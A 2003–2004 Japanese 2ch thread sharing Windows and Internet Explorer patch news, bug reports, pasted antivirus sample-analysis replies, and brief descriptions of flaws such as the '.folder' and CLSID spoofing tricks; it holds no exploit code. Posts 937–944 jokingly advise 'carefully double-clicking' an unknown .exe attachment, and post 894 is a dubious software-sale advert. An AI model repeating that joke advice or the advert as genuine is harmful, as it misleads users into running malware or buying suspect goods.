864名無しさん@お腹いっぱい。:03/11/16 16:21 ID:???
まだこのスレには載っていないみたいなので、念のためまとめてみます。

◆◆ MS03-048 (824145) に関する非公式情報 ◆◆
このパッチにより、IEのスクロールバーの空白部分をクリックした時の
スクロールの挙動が変更されることがある模様です。
私の実験(WinXP Home SP1)では、(※下記2chスレによると、98,Me,2000でも同様です)
スクロールバーの空白部分をクリックすると、パッチをあてる前と比べて
約2倍スクロールします。ただし、スクロールバーの■になっている部分の
すぐ上か下(2pxくらい)をクリックした場合は 1画面分スクロールします。

また、IEでCtrl+Fを使った検索をしたときに、スクロールバーの▼部などを
クリックすると、検索がはじめからやり直しになりました。

未確認情報ですが、ブラウザの2ch投稿欄で横にスクロールさせようとすると
強制的にテキストの最後にカーソルがうつってしまうこともあるようです。

●関連リンク
MS03-048: Internet Explorer 用の累積的なセキュリティ更新 (824145)
ttp://www.microsoft.com/japan/technet/security/bulletin/MS03-048.asp

IE6.0に最新パッチ当てたらスクロールが二回分進む現象
http://news4.2ch.net/test/read.cgi/news/1068657452/l50
865名無しさん@お腹いっぱい。:03/11/16 16:25 ID:???
追記: 「アプリケーションの追加と削除」から
     「Internet Explorer Q824145」を削除すると
    この問題はおこらなくなりました。
866Hacktool.WKRShell:03/11/16 16:34 ID:???
セキュリティホール memo
http://www.st.ryukoku.ac.jp/~kjm/security/memo/

Workstation サービスのバッファオーバーランにより、コードが実行される (828749) (MS03-049)
http://www.st.ryukoku.ac.jp/~kjm/security/memo/#20031112_MS03-049
EEYE: Windows Workstation Service Remote Buffer Overflow (eEye、2003.11.12)
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/bugtraq/2003.11/msg00140.html
MS03-049が危険な理由 (ZDNet)
http://www.zdnet.co.jp/enterprise/0311/14/epn02.html
867Hacktool.WKRShell:03/11/16 16:35 ID:???
あなたが送られたファイルに関する情報や現在の状態をお知らせします。
ファイルを分析しました。送られたそれぞれのファイルについてわかったことを
以下に報告します。
ファイル名: 結果: このファイルは次のウィルスに感染しています:
Hacktool.WKRShell
デベロッパーノート:
ファイル名 is non-repairable threat. NAV with the latest beta definition detects this. Please delete this file and replace it if neccessary. Please follow the instruction at the end of this email message to install the latest beta definitions.

Hacktool.WKRShell is non-repairable threat. NAV with the latest beta definition detects this. Please delete this file and replace it if neccessary. Please follow the instruction at the end of this email message to install the latest beta definitions.

ご提出いただいたサンプルについて、シマンテック・セキュリティ・レスポンスはウイルス、ワームまたはトロイの木馬に感染していると判断いたしました。
(C)2003 シマンテック・セキュリティ・レスポンス
(P)2003 シマンテック・セキュリティ・レスポンス
868名無しさん@お腹いっぱい。:03/11/16 17:54 ID:???
このパッチの影響で、”極窓”が設定を記憶しないなどの影響がある模様。
俺の2000/IE5.01SP4でも発症
869名無しさん@お腹いっぱい。:03/11/16 18:09 ID:???
↑は最新版で対処済み
870名無しさん@お腹いっぱい。:03/11/17 22:10 ID:???
すみません、最近なんかパソコンの挙動がおかしく、送信バイト数がものすごい勢いで流れていくのを確認し、
何かと思ってNEGiEsでパケットモニタしてみると、ものすごい勢いでICMPプロトコルが流れていきます
読み取れないほどの速度で、10分に10MBほど送信しています。
これって何でしょうか?(´・ω・`)
871870:03/11/17 22:14 ID:PEJr9iKv
OSはウィンドウズ2000SP4&windowsアップデートのみ
LAN2本さして、片方はADSL側です
872名無しさん@お腹いっぱい。:03/11/17 22:35 ID:???
>>870=871
ウイルス検索はした?
というか、ここは質問スレじゃないぞ。

これに答えなくていいから別スレに行くべし。
873名無しさん@お腹いっぱい。:03/11/18 18:27 ID:???
>>870
【セキュリティ】 - Blasterスレ part5
http://pc.2ch.net/test/read.cgi/sec/1065964513/

ここの6-25を熟読スレ。
874Hacktool.WKRShell:03/11/18 22:23 ID:???
875名無しさん@お腹いっぱい。:03/11/19 21:02 ID:???
>>864
マイクロソフト サポート技術情報 - 832270
スクロールバーの空白部分をクリックすると画面スクロールが正しく行われない
http://support.microsoft.com/default.aspx?scid=kb;ja;832270
876Hacktool.WKRShell:03/11/21 00:16 ID:???
http://www.symantec.com/region/jp/sarcj/data/h/hacktool.wsrshell.html

Hacktool.WKRShell
セキュリティホール memo
http://www.st.ryukoku.ac.jp/~kjm/security/memo/

Workstation サービスのバッファオーバーランにより、コードが実行される (828749) (MS03-049)
http://www.st.ryukoku.ac.jp/~kjm/security/memo/#20031112_MS03-049
EEYE: Windows Workstation Service Remote Buffer Overflow (eEye、2003.11.12)
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/bugtraq/2003.11/msg00140.html
MS03-049が危険な理由 (ZDNet)
http://www.zdnet.co.jp/enterprise/0311/14/epn02.html
877名無しさん@お腹いっぱい。:03/11/23 19:54 ID:???
>>876
スレ違いだろ。
878名無しさん@お腹いっぱい。:03/11/23 19:55 ID:???
>>876
間違えた。何回もコピペウザイ。
879窓板住人 ◆winDOwS0aE :03/11/25 22:39 ID:???
Windows HotFix Briefings Biweekly(11月21日版)
―― 修正プログラム適用に関する問題点、不具合情報の隔週レポート ――
http://www.atmarkit.co.jp/fwin2k/hotfix/hfbw20031121/hfbw20031121_01.html

・MS03-043の修正プログラム適用で、Windows NT 4.0のネットワーク関連機能が機能不全を起こす
・MS03-045の修正プログラムを適用すると、テキスト・ボックスに入力した文字が重複して表示される
・MS03-050をExcel 97に適用すると郵便番号変換ウィザードが機能しなくなる
・「Windows XP SP1 USB 1.1 および 2.0 修正プログラム」の適用で、システムがハングアップする
・MS03-048を適用するとInternet Explorerの画面スクロールが正しく行われなくなる
・Windows 2000 SP4にIE 6.0 SP1を適用するとMS02-050の脆弱性が再発する問題を解決する
 修正プログラムの提供開始

マイクロソフト サポート技術情報 - 832547
[IE] Q824145 (MS03-048) のインストール後、エクスプローラの「関連項目」のリンクが機能しない
http://support.microsoft.com/default.aspx?scid=kb;ja;832547
880窓板住人 ◆winDOwS0aE :03/11/26 23:07 ID:???
881ぼるじょあX ◆TlQZOS.G3s :03/11/27 08:36 ID:???
Internet Explorerの新セキュリティホールは「極めて危険」http://www.zdnet.co.jp/enterprise/0311/26/epi02.html
882名無しさん@お腹いっぱい。:03/11/27 09:32 ID:i7lyECbZ
一番いいのは、Windows使わないこと。これ最強!
実際、linuxでもMacでも困らんよ。
883名無しさん@お腹いっぱい。:03/11/27 14:41 ID:???
LinuxでもMacでもUNIXでもなんでも、きちんとパッチを当ててない
システムはどれも脆弱。これ管理者の常識。
そして、このスレはそういうことを論議するスレでもないことも知れ。
884名無しさん@お腹いっぱい。:03/11/28 11:52 ID:62QqKD1n
(´д`)ノシ先生質問です!
昨日
Microsoft Windows XP 用セキュリティ問題の修正プログラム (KB828035)
をアップデートしたんですが
次の日PCを起動するといきなり青い画面が出てきて
なにかディスクスキャンらしきことを始めてますた。
これってアップデートしたこととは関係ないんですか?
しかも起動に時間がめっちゃかかるんですが...
885名無しさん@お腹いっぱい。:03/11/28 12:33 ID:YO3hFma2
インターネット上のwebサーバはWindowsよりUNIX系OSで立てた物が多いが
ここまで修正パッチに追われることも、頻繁にワームに感染して無駄なトラフィック
を垂れ流すこともない。

 一方Windowsのセキュリティ問題はOS構造そのものに起因しているので、一から
見直さない限り、セキュリティパッチ充て地獄からは逃れられない。

 例えばIEのような一ネットワークアプリをOSにくくりつけるのを止めるだけでも、
安全度は飛躍的にアップすると思われるが、独禁法のがれのためにIEはOSの一部と言い切
って しまった以上、いまさらOSとIEを切り離すことはできない。

 仕方がないのでMSは定期アップデイトという対症療法をユーザーに押しつけることにした。
886名無しさん@お腹いっぱい。:03/11/28 13:36 ID:???
>>885
こういうのがリナ鯖やウニ鯖運用したら、
ワームに感染しても気づかないんだろうな
887名無しさん@お腹いっぱい。:03/11/28 13:56 ID:UaD4/qdC
>>656
お願いします
888名無しさん@お腹いっぱい。:03/11/28 14:01 ID:FA95u7l+
>>885 新しいPCに赤帽入れてとりあえずちゃんと動くかどうかネットにつなげて
その日は疲れたから電源入れっぱなしで寝たら、次の日しっかり踏み台にされたらしく
プロバから注意のメールが来てた。Linux恐るべし。
889名無しさん@お腹いっぱい。:03/11/28 17:09 ID:UaD4/qdC
>>656
norton internet security2003 を使っているんですけど
firewallのプログラム制御で>>656は すべて遮断 でいいんですか?
890名無しさん@お腹いっぱい。:03/11/28 17:37 ID:bu19wB/p
>>888
Debianにしてスクリプトで毎日apt-getして済ます。
おいらはソースにstableを指定して自爆したことがあるけど。
891名無しさん@お腹いっぱい。:03/11/28 19:53 ID:Dc9lygu4
>>885

ホントにユーザーのため? マイクロソフトのセキュリティ戦略を検証する
http://japan.cnet.com/news/pers/story/0,2000047682,20062200,00.htm

いい加減みんな気がつき始めてるな。。
だまされ続けてるのは頭の悪いドザだけということで。
892名無しさん@お腹いっぱい。:03/11/28 20:01 ID:???
>>888

詳細きぼん。踏み台にされたのは、何のサービス?
893名無しさん@お腹いっぱい。:03/11/28 20:03 ID:???
NASAかどっかへのアタックの踏み台にされたのも個人のLinuxPCだったっけ?
Linux=安全と思いこんでる厨は本当に迷惑だな。
894名無しさん@お腹いっぱい。:03/11/28 20:05 ID:???
25歳。
去年まで金無し君だったけど、ネット通販で
マイクロソフト製品を激安でゲット。一度やってみなよ。
買うだけ買って開封せずにオークションで転売することもできるし、ゲーム買って
近所のゲーム屋に売れば手っ取り早く現金にできる。
金無くてもオフィスXPとか超安い。
ダンジョンシージとかフライトシミュレーターとか色々あるのでマジでお勧め。

http://www.tatakiuri.com/
895名無しさん@お腹いっぱい。:03/11/28 20:07 ID:???
>>893
少なくともどっかのホムペ見ただけでウイルス感染するアホOSよりはマシ。
896名無しさん@お腹いっぱい。:03/11/28 20:08 ID:???
>>895
アホOSって、OSXっていう名前かい?
897名無しさん@お腹いっぱい。:03/11/28 20:09 ID:???
いえいえ、ブラウザーとOSが一体になっているウィンドウズのことです。
898名無しさん@お腹いっぱい。:03/11/28 20:56 ID:???
いい加減スレ違いな話はやみり。
ここはWindows関係のセキュリティ情報の交換場所。
ゴミが増えるのは迷惑。
899名無しさん@お腹いっぱい。:03/11/28 23:14 ID:???
900ぼるじょあX ◆TlQZOS.G3s :03/11/29 10:23 ID:???
IEに複数のセキュリティ・ホール,対策はアクティブスクリプトを無効にすること
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20031128/136983/

(・3・)ノ
ファイルを分析しました。送られたそれぞれのファイルについてわかったことを
以下に報告します。
ファイル名: MhtRedirLaunchInetExe-Demo.zip
ファイル名: mhtml_file_for_codebase_automated.htm
デベロッパーノート

MhtRedirLaunchInetExe-Demo.zip is a self-extracting zip file that contains a clean file.
mhtml_file_for_codebase_automated.htm This file is proof-of-concept for an exploit.
It is not viral but we suggest to delete it.
This file is contained by MhtRedirLaunchInetExe-Demo.zip.

(C)2003 シマンテック・セキュリティ・レスポンス
(P)2003 シマンテック・セキュリティ・レスポンス
903名無しさん@お腹いっぱい。:03/12/10 13:56 ID:???
最近何も無いの?
904名無しさん@お腹いっぱい。:03/12/10 14:54 ID:NKc9m8VS
>>903
Win98だけでなく、OfficeXP以前のパッチの提供が止まるかもしれない。
905名無しさん@お腹いっぱい。:03/12/10 20:20 ID:r1+HXUMk
Internet Explorerにオンライン詐欺を助長する新たな欠陥

 米Microsoftのウェブブラウザ、Internet Explorer(IE)に新たな欠陥が発見された。
あるセキュリティ研究者によると、この欠陥を利用したオンライン詐欺師は、インター
ネットユーザーを騙し、機密情報を開示させたり、悪意あるコードを実行させることが
可能という。

http://japan.cnet.com/news/ent/story/0,2000047623,20062654,00.htm
906名無しさん@お腹いっぱい。:03/12/10 22:19 ID:???
Microsoftの“月例”セキュリティ・パッチ、今月はなし
ttp://arena.nikkeibp.co.jp/news/20031210/106687/

どーみてもさぼってるだけぢゃん。。。
907名無しさん@お腹いっぱい。:03/12/11 00:05 ID:F55/6LC+
>>906
新たにパッチを出すよりも、JAVAを外したりとか、
IEを外したりできる公式のソフトを出してほしい、そのほうが早いよ・・・
908名無しさん@お腹いっぱい。:03/12/16 20:33 ID:???
保守
909名無しさん@お腹いっぱい。:03/12/17 12:27 ID:???
ttp://www.asahi.com/national/update/1217/014.html
 patch 当ててなかったというのも痛い。
 除去するのにシステムの再インストールが必要だったって、いったい、、、
910名無しさん@お腹いっぱい。:03/12/17 22:50 ID:???
誰も責任取ることのないところなんてこんなもんでしょ。
911名無しさん@お腹いっぱい。:03/12/18 06:44 ID:NQmblQqQ
URL偽装
ttp://pc.2ch.net/test/read.cgi/pcnews/1043134572/l50
%[email protected]/cda/special/2003/12/16/1522.html
IEにURLを偽装できるパッチ未公開の脆弱性が発見される
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/12.html#20031211_IE

NAI VirusScan のウィルス定義ファイル 4311 以降で、この欠陥に対応されている。
http://www.nai.com/japan/

Exploit-URLSpoof
http://www.nai.com/japan/security/virE.asp?v=Exploit-URLSpoof

こんな感じで表示される:
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2004/0105-exploit-urlspoof.jpg

 
913Download.Trojan:04/01/06 15:17 ID:???
Download.Trojan

セキュリティホール memo
http://www.st.ryukoku.ac.jp/~kjm/security/memo/

[Full-Disclosure] Self-Executing HTML: Internet Explorer 5.5 and 6.0 Part IV
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/full-disclosure/2004.01/msg00011.html
http://www.malware.com/
914Download.Trojan:04/01/06 15:18 ID:???
ファイルを分析しました。
送られたそれぞれのファイルについてわかったことを以下に報告します。
結果: デベロッパーノートを参照してください。
結果:このファイルは次のウィルスに感染しています:
Download.Trojan

デベロッパーノート:
This archive contains malicious code. Any malicious contents will be detected by NAV
if they are extracted from the archive. Please delete this file.
***html is non-repairable threat. NAV with the latest beta definition detects this.
Please delete this file and replace it if neccessary. Please follow the instruction
at the end of this email message to install the latest beta definitions.
This file is contained by ***

***.html will download a Trojan dropper to your system when running.
NAV with the latest beta definition detects this. Please delete this file
and replace it if neccessary. Please follow the instruction at the end of
this email message to install the latest beta definitions.

ご提出いただいたサンプルについて、シマンテック・セキュリティ・レスポンスは
ウイルス、ワームまたはトロイの木馬に感染していると判断いたしました。

(C)2004 シマンテック・セキュリティ・レスポンス
(P)2004 シマンテック・セキュリティ・レスポンス
915窓板住人 ◆winDOwS0aE :04/01/10 16:13 ID:92CIWvGH
あけましておめでとうございます。
さて、以下のようなニュースが出てますのでご注意を。

Norton AntiVirusで定義ファイルを更新するとMS Officeに不具合
http://japan.cnet.com/news/ent/story/0,2000047623,20063594,00.htm

2004 年 1 月 7 日以降、コンピュータの動作が異常に遅くなり、Microsoft Word や Excel が起動できなくなった
http://service1.symantec.com/SUPPORT/INTER/navjapanesekb.nsf/jp_docid/20040108142217958
916窓板住人 ◆winDOwS0aE :04/01/11 00:54 ID:8y3CVxYJ
マイクロソフト サポート技術情報 - 834374
Windows Update でエラーが発生した場合のエラー番号について
http://support.microsoft.com/default.aspx?scid=kb;ja;834374

マイクロソフト サポート技術情報 - 319011
エラー メッセージ : 次のファイルが存在しないかまたは壊れているため、
Windows 2000 を起動できませんでした: \Winnt\System32\Config\System
http://support.microsoft.com/default.aspx?scid=kb;ja;319011

マイクロソフト サポート技術情報 - 834367
ハイパー スレッディング対応マシンにて修正プログラムをアンインストールすると発生する問題
http://support.microsoft.com/default.aspx?scid=kb;ja;834367

マイクロソフト サポート技術情報 - 823659
セキュリティ設定およびユーザー権利の割り当てを変更すると、クライアント、サービス、
およびプログラムとの互換性がなくなる
http://support.microsoft.com/default.aspx?scid=kb;ja;823659

マイクロソフト サポート技術情報 - 833330
Windows 2000 または Windows XP を実行するコンピュータから Blaster ワームまたは
Nachi ワームを駆除するツールについて
http://support.microsoft.com/default.aspx?scid=kb;ja;833330
IEに2種類の新たなセキュリティ・ホールが見つかる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040110/138152/

(・3・) またですYO
918名無しさん@お腹いっぱい。:04/01/11 23:08 ID:F+iWJxJ/
小5のある日、兄の自転車を借りて坂を下ってたら
実はブレーキがすごく甘くなってて、
ブレーキしてもどんどんスピードが上がっていって
靴のつま先で無理やりブレーキさせても靴が磨り減るだけで
仕方なく路肩の植木に身を投げたら擦り傷いっぱいでスカート破けて
そのままエロティックな格好で泣きながら家に帰ったら
母がいきなり
「誰にやられたの!」
と聞いて来たのでは私はお兄ちゃんの自転車で…と言うつもりが
泣きじゃくってるせいでうまくいえず
「お…お兄ちゃん…」
と呟いたら母は突然倒れてそのまま気絶してました。
919名無しさん@お腹いっぱい。:04/01/11 23:56 ID:A3N5b2hf
>>918
コピペ
920名無しさん@お腹いっぱい。:04/01/12 00:11 ID:???
いちいち言わなくても大半のやつはわかるだろ。わからん厨房のほうがわるい。
面白いから好きだけど、この小話。
921名無しさん@お腹いっぱい。:04/01/12 16:30 ID:???
今月から一人暮らし始めたんですが、なんかおかしなものが見えるんです。

俺の部屋にはユニットバスってのがあるんですが、そこの壁の中に人が住んでるんです。
俺がトイレに行って用を済ませて手を洗おうとすると必ずそいつが出てきて
俺のまねをして手を洗う、そして手を拭くとそいつも手を拭くんです。

初めてそいつに会ったときにお前は誰だと聞いたんですが何かそいつも
同時に何か言おうとしたらしく口をパクパクさせてたからじゃあお前から言えって
言って俺は黙って待ってたんです。そしたらそいつも黙ってるし・・・

で、そんなやりとりが何度かあった後でこっちも我慢できなくなって胸倉を
掴もうとしたんです。そしたらそいつも俺の胸倉を掴もうとするじゃないですか。
俺はそのとき身の危険を感じたんですぐに台所に行って包丁を持ってまた戻ったんです。
もちろん刺したりしませんよ。脅すためです。
そうしたらなんと、そいつも俺と同じように包丁を手に持ってるじゃないですか。

もうこれは本当に危ないと思って俺、そこを飛び出したんです。
こんなとんでもない部屋を紹介した不動産屋に怒鳴り込んでやろうと思ったんですが
部屋に戻らないと電話番号とかわからないし、でも戻ると殺されるかもしれない。
どうすればいいですか?やはり警察に行ったほうがいいんでしょうか?

でも警察は実際に被害がないと動いてくれないって聞いたことがあるので
行っていいものかどうか迷っています。だれかよい知恵を下さい。
922名無しさん@お腹いっぱい。:04/01/13 01:13 ID:/hNX3t+E
>>921
OSとバージョンは?
923名無しさん@お腹いっぱい。:04/01/13 02:03 ID:SJsg+GPp
              __,,,,,,
         ,.-'''"-─ `ー,--─'''''''''''i-、,,
      ,.-,/        /::::::::::::::::::::::!,,  \
     (  ,'          i:::::::::::::::::::::;ノ ヽ-、,,/''ー'''"7
      `''|          |:::::::::::::::::::::}     ``ー''"
        !       '、:::::::::::::::::::i
        '、 `-=''''フ'ー''ヽ、::::::::::/ヽ、-─-、,,-'''ヽ 
         \_/     ヽ--く   _,,,..--┴-、 ヽ
                     ``"      \>
924:04/01/13 02:04 ID:Bidp/OTD
925窓板住人 ◆winDOwS0aE :04/01/13 22:34 ID:???
ZDNet UK - News - Windows 98 gets support reprieve
http://news.zdnet.co.uk/0,39020330,39119028,00.htm

Microsoft has extended support for Windows 98, Windows 98 SE and Windows ME.
The software giant has extended support for the operating systems until 30 June, 2006.

98/98SE/MEのサポート期間が延長されるとの報道です。
まだ更新されてはおりませんがMS公式のサポート期間は以下のサイトで検索することができます。
http://www.microsoft.com/japan/windows/lifecycle/default.mspx
926名無しさん@お腹いっぱい。:04/01/14 03:35 ID:???
927窓板住人 ◆winDOwS0aE :04/01/14 19:30 ID:???
MDAC 機能のバッファ オーバーランにより、コードが実行される (832483) (MS04-003)
http://www.microsoft.com/japan/technet/security/bulletin/ms04-003.asp
このセキュリティ情報の対象となるユーザー : MicrosoftR WindowsR を使用しているお客様
脆弱性の影響 : リモートでコードが実行される
最大深刻度 : 重要
推奨する対応策 : お客様は、修正プログラムをできるだけ早期にインストールしてください。

Exchange Server 2003 の脆弱性により、権限が昇格する (832759) (MS04-002)
http://www.microsoft.com/japan/technet/security/bulletin/ms04-002.asp
このセキュリティ情報の対象となるユーザー : Outlook Web Access for Microsoft
Exchange Server 2003 を実行しているサーバーを使用しているシステム管理者
脆弱性の影響 : 権限の昇格
最大深刻度 : 警告
推奨する対応策 :
システム管理者はこのセキュリティ修正プログラムを Outlook Web Access for
Microsoft Exchange Server 2003 を実行しているすべてのフロントエンドサーバーに
インストールして下さい。また、バックエンド サーバーをフロントエンドサーバーのロールに
移行する場合を考慮して、このセキュリティ修正プログラムを Exchange Server 2003 を
実行しているすべてのコンピュータにインストールすることを推奨します。

Microsoft Internet Security and Acceleration Server 2000 H.323 フィルタの脆弱性により、
リモートでコードが実行される (816458) (MS04-001)
http://www.microsoft.com/japan/technet/security/bulletin/MS04-001.asp
このセキュリティ情報の対象となるユーザー : Microsoft Internet Security and Acceleration
Server 2000 をご使用のお客様
脆弱性の影響 : リモートでコードが実行される
最大深刻度 : 緊急
推奨する対応策 : お客様は、セキュリティ修正プログラムを直ちにインストールしてください。
※この件に関してはCERT Advisoryが出てます。
CERTR Advisory CA-2004-01 Multiple H.323 Message Vulnerabilities
http://www.cert.org/advisories/CA-2004-01.html
928追記 Download.Trojan:04/01/16 00:24 ID:???
929名無しさん@お腹いっぱい。:04/01/16 01:36 ID:lpjI+vil
930 :04/01/24 22:46 ID:???
 
931名無しさん@お腹いっぱい。:04/01/24 22:52 ID:u/qYS5Dx
>>921
それは鏡だよ。
932名無しさん@お腹いっぱい。:04/01/24 23:17 ID:9lGK4i7l
本文のないメールが来て、そこの添付ファイルがありました。
そのファイルは
vbLf.exe
htmlbanner[1].html
というのがあります。
添付ファイルは実行してません。
これってウィルスですか?
ウィルスだったらメールを削除するだけでいいんでしょうか?
933名無しさん@お腹いっぱい。:04/01/25 00:24 ID:???
それだけでは何とも判断できませんな。

添付ファイルを注意深くダブルクリックしプロパティを表示して、
その内容をここに貼ってみてください。
934名無しさん@お腹いっぱい。:04/01/25 01:41 ID:DiSeD67n
スレ違いかもしれませんが、どこで聞いたらいいのかわからないので
よろしくお願いします。
ヤフーメッセンジャーを起動するたびに、
「許可しますか?」というのが表示されているので
邪魔だなと思い、誤って「いいえ」をクリックして
「その状態を記憶する(保存する?)」にしてしまったところ
ヤフーメッセンジャーにログインできなくなりました。
私のミスなんですが、どうしたら解除できるんでしょうか?
アンインストールの後にインストールし直しましたが無理でした。
どなたかアドバイスよろしくお願いします。
935名無しさん@お腹いっぱい。:04/01/25 09:42 ID:???
936932:04/01/25 13:43 ID:u4ZKXB5b
>>933
知らない差出人からのメールに添付されてる「.exe」は実行するな、
と聞いたことがあった気がするのですぐ削除しました。
一応なんともないので大丈夫だと思います。
937名無しさん@お腹いっぱい。:04/01/25 13:55 ID:???
いえ、注意深くダブルクリックすれば大丈夫ですよ。

今回は残念でしたが、また同じようなものが送られてきた時には
細心の注意をはらって、慎重にダブルクリックしてください。
938932:04/01/25 15:27 ID:u4ZKXB5b
>>937
はい、注意深くダブルクリックすればいいんですね?w
わかりました〜
これからは注意深くダブルクリックしてみますw

貴重なアドバイスありがとうございました
939名無しさん@お腹いっぱい。:04/01/25 17:49 ID:mmxwL2bB

参考になりました。
940名無しさん@お腹いっぱい。:04/01/25 17:56 ID:???
>いえ、注意深くダブルクリックすれば大丈夫ですよ。
注意深いダブルクリクってどんなのよ?
941名無しさん@お腹いっぱい。:04/01/25 23:01 ID:???
心を込めた優しいタッチで軽くダブルクリックすることだと
パソコン教室の先生が教えてくれました

942名無しさん@お腹いっぱい。:04/01/26 00:49 ID:???
周囲の人たちにみつからないようにこっそりとダブルクリックすることだと
先輩がいってました。
943亀仙人:04/01/26 21:06 ID:???
ぱふぱふ と、押すのじゃ。
944名無しさん@お腹いっぱい。:04/01/28 00:03 ID:+Y9QEvWd
内側にねじり混むようにして打つべし!打つべし!打つべし!
945名無しさん@お腹いっぱい。:04/01/31 11:59 ID:???
946名無しさん@お腹いっぱい。:04/02/02 01:42 ID:BxQTpS1o

リモートからコマンドを実行できるWindowsの“仕様”を発見
http://itpro.nikkeibp.co.jp/free/NBY/NEWS/20040130/139143/

.∧∧
(,,゚Д゚)< 仕様がないOSだこと。
|O旦O
.∪∪
947名無しさん@お腹いっぱい。:04/02/02 10:00 ID:UXeJ1w6O
やっぱりバックドアがあったか>窓
948名無しさん@お腹いっぱい。:04/02/03 06:22 ID:???
MS04-004 : Internet Explorer の重要な更新
Internet Explorer 用の累積的なセキュリティ修正プログラム (832894)

ttp://www.microsoft.com/japan/security/security_bulletins/MS04-004e.asp

だそうだ。
949名無しさん@お腹いっぱい。:04/02/03 12:17 ID:???
俺、IEなんて使ってないんだけどなぁ…
950名無しさん@お腹いっぱい。:04/02/03 12:43 ID:tgaFgwAV
>>948
今やってるが、おっそろしく重いわけだが・・
951名無しさん@お腹いっぱい。:04/02/03 13:02 ID:LLw/TDhU
マイクロソフトは、高いWindowsServerを無料で使えるのに、サイトはLinuxに依存。

http://www.netcraft.com/?host=microsoft&position=limited&lookup=Search

「What's that site running?]」をクリックして確認して下さい。
世界中のマイクロソフトは、表向きmicrosoft.comだけWindowsServer使っていますが、
実際はLinux依存なのですよ。もう騙されないぞ!

米Microsoftは、自社ウェブサイトを攻撃者から守るために、Linuxを使っている。
http://japan.cnet.com/news/ent/story/0,2000047623,20060667,00.htm

Windowsではとても持ちません。Windows無料で使えるマイクロソフトでさえ使いませんw
952名無しさん@お腹いっぱい。:04/02/03 13:06 ID:???
Win98seでIE5.5使ってるが
このままで大丈夫なんだよな?
953怪鼠 ◆9YLawNEZMI :04/02/03 13:16 ID:Bbf945rb
>>948
児童ダウンでそのウプデータンキター
MS04-004 : Internet Explorer の重要な更新
Internet Explorer 用の累積的なセキュリティ修正プログラム (832894)
954名無しさん@お腹いっぱい。:04/02/03 13:20 ID:???
月刊WinUpまた臨時増刊かよ
955名無しさん@お腹いっぱい。:04/02/03 13:28 ID:???
>>948
これあてたマシン、ネットにつながらなくなっちゃったよTT
956名無しさん@お腹いっぱい。:04/02/03 14:21 ID:???
>>960
ネット環境は何よ?
957名無しさん@お腹いっぱい。:04/02/03 16:42 ID:???
どうしてこう穴だらけなんだ、MSの製品は!
と、今更言っても詮無いことか。トホホ・・・。
958名無しさん@お腹いっぱい。:04/02/03 20:10 ID:???
>>949
Windows95でもない限り、パッチは当てとけ
959名無しさん@お腹いっぱい。:04/02/04 11:04 ID:WMxm+VNf
960名無しさん@お腹いっぱい。:04/02/04 14:00 ID:???
ISDN
961名無しさん@お腹いっぱい。:04/02/05 14:02 ID:4TPjkmux
次スレある?
962名無しさん@お腹いっぱい。:04/02/05 14:18 ID:???
ニュース板でやる必要ある?
963名無しさん@お腹いっぱい。:04/02/05 16:41 ID:DOdmFFSr
単発質問やネタスレよりも全然やる意義があるだろう。
964名無しさん@お腹いっぱい。:04/02/05 16:49 ID:???
下と比べないと存在意義がないスレだな
965名無しさん@お腹いっぱい。:04/02/06 00:42 ID:pEFbzRDI
IEの最新パッチ--「問題は直っていない」と一部ユーザーから報告
http://japan.cnet.com/news/ent/story/0,2000047623,20064145,00.htm

966名無しさん@お腹いっぱい。:04/02/06 14:01 ID:???

XPそろそろLonghornに替わるんでしょうに、また欠陥OSだったってことか。
次も期待出来ん Mac買うぞ!! ぼけMS。
967名無しさん@お腹いっぱい。:04/02/06 16:19 ID:???
>>966
MacよりLinux
968名無しさん@お腹いっぱい。:04/02/06 17:21 ID:???
【総合】スパイウェア予防駆除関連ソフトPart1
http://pc.2ch.net/test/read.cgi/sec/1064493726/

これをここに統合したらどうかという案がいきなり浮上してきました。
よかですか?
969名無しさん@お腹いっぱい。:04/02/06 17:52 ID:???
>>967
LinuxよりShidax
970名無しさん@お腹いっぱい。:04/02/06 19:29 ID:???
ShidaxよりPentax
971名無しさん@お腹いっぱい。:04/02/06 19:49 ID:???
つうか仕事の大半がプレーンテキストの操作な立場だと、UNIX系の環境が一番快適。
漏れはFreeBSDを使ってるけどな。(MacOS10は軽く弄ったが、吐き気がしたので止めた)

excelで報告書を仕上げるのが仕事な人は、WindowsかMacしか選択肢無いだろうけど。
972名無しさん@お腹いっぱい。:04/02/06 20:57 ID:???
>>971
*Linux/*BSD上でOOorgでも良いのでは?
殆どの人はVBAなんて使っていないだろうし。
973窓板住人 ◆winDOwS0aE :04/02/07 02:29 ID:???
すんません、出張してました。まとめて行きます。

■ 「フォルダ」に見せかけ任意のファイルを実行――Windows XPを狙う手口に警告
(ITmedia, 2004.01.28)
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2004/01.html#20040129_folder
概要:Windows XP は、.folder 拡張子がついているとフォルダとして表示する
(.folder 拡張子のファイルにはフォルダアイコンを表示する)
ダブルクリック時にどのように処理するかは、動的に決定する
(中身が HTML のようなら HTML として処理する)
ことを利用し、フォルダのように見えるアイコンをダブルクリックすると悪意ある
プログラムの実行によって攻撃される。

■ Internet Explorer File Download Extension Spoofing
(secunia.com, 2004.01.28)
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2004/01.html#20040130_IEfilespoof
IE 6 に欠陥。ファイル名に CLSID を埋め込むことにより、IE がファイルを「開く」場合に、
本来開かれるべきアプリケーションではなく、CLSID に示されるアプリケーションが起動されてしまう。
974窓板住人 ◆winDOwS0aE :04/02/07 02:30 ID:???
■ ATOK15・16に不正に一部操作が可能になる脆弱性が発見される〜アップデートモジュールで修正可能
(Internet Watch, 2004.02.02)
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2004/02.html#20040203_ATOK
概要: http://pc2.2ch.net/test/read.cgi/software/1070102837/792

■Windows版コリャ英和!/LogoVistaシリーズのセキュリティ修正プログラムについて (logovista.co.jp)。
■ RealNetworks, Inc.、セキュリティ脆弱性に対応するアップデートをリリース (real.com)。
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2004/02.html#20040206_various
975窓板住人 ◆winDOwS0aE :04/02/07 02:44 ID:???
Internet Explorer 用の累積的なセキュリティ修正プログラム (832894) (MS04-004)
